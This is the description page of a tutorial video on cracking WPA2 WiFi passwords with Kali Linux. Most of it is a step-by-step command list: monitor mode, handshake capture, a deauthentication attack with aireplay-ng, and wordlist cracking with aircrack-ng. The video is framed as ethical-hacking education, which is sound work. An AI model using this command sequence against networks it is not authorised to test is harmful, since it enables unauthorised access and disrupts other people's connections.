Cracking WiFi WPA2 Handshake

Опубликовано: 02 Февраль 2021
на канале: David Bombal
2 млн
50 тыс

Full process using Kali Linux to crack WiFi passwords. I discuss network adapters, airmon-ng, airodump-ng, aircrack-ng and more in this video.

Menu:
Use airmon-ng to crack WiFi networks: 0:00
Network Adapter to use: 0:46
Kali Linux setup: 1:20
Plug in network adapter: 1:35
Verify that network adapter is recognized by Kali Linux: 2:04
WPA2 network to crack: 2:43
iwconfig: 3:27
Kali Version: 3:34
Kill conflicting processes with airmon-ng: 3:55
Put interface into monitor mode: 4:32
Discover WiFi Networks with airodump-ng: 5:15
Use airodump-ng to view only one network: 6:20
Connect to network using an iPhone: 6:39
airodump-ng capture WPA2 four way handshake: 6:58
Use aireplay-ng to deauthenticate clients: 7:25
WPA2 four way handshake captured: 8:08
Use Wireshark to view WPA2 four way handshake: 8:38
Put interface back into managed mode: 9:30
Crack WPA2 password with aircrack-ng: 10:10
Password cracked: 11:00
WiFi router WPA2 settings: 12:00
Summary: 12:40

================
Network Adapters:
================
Alfa AWUS036NHA:
Alfa AWUSO36NH:

================
Commands used:
================
! See version of Kali
cat /etc/os-release
uname -a

! See interfaces
ip addr
iwconfig

!kill processes
sudo airmon-ng check kill

!Start monitor mode
sudo airmon-ng start wlan0

!Verify that monitor mode is used
sudo airmon-ng

!You could also use iwconfig to check that interface is in monitor mode:
iwconfig

! Get the AP's MAC address and channel
sudo airodump-ng wlan0mon

! AP-MAC & channel - you need to select your own here:
ESSID: 90:9A:4A:B8:F3:FB
Channel used by AP for SSID: 2

!1st Window:
!Make sure you replace the channel number and bssid with your own
!Replace hack1 with your file name like capture1 or something
sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon

!2nd Window - deauth attack
!Make sure you replace the bssid with your own
sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon

!Use Wireshark to open hack file
wireshark hack1-01.cap
!Filter Wireshark messages for EAPOL
eapol

!Stop monitor mode
airmon-ng stop wlan0mon

!Crack file with Rock you or another wordlist
!Make sure you have rockyou in text format (unzip file on Kali)
!Replace hack1-01.cap with your file name
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt

================
Previous videos:
================
Kali Installation:
WPA2 GPU password cracking:
Wordlists (rockyou):

================
Connect with me:
================
Discord:
Twitter:
Instagram:
LinkedIn:
Facebook:
TikTok:
YouTube:

================
Support me:
================
Buy my CCNA course and support me:
DavidBombal.com: CCNA ($10):
Udemy CCNA Course:
GNS3 CCNA Course: CCNA ($10):

======================
Special Offers:
======================
Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P

wifi
kali linux
kali linux 2020
kali linux 2020.4
wifite
wpa
wep
wps
alfa
comptia
ceh
oscp
wifi
airmon-ng
aircrack-ng
hack
hacker
hacking
ethical hacking
kali
ine

Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!


Смотрите видео Cracking WiFi WPA2 Handshake онлайн без регистрации, длительностью 13 минут 29 секунд в хорошем hd качестве. Это видео добавил пользователь David Bombal 02 Февраль 2021, не забудьте поделиться им ссылкой с друзьями и знакомыми, на нашем сайте его посмотрели 2 миллионов раз и оно понравилось 50 тысяч людям.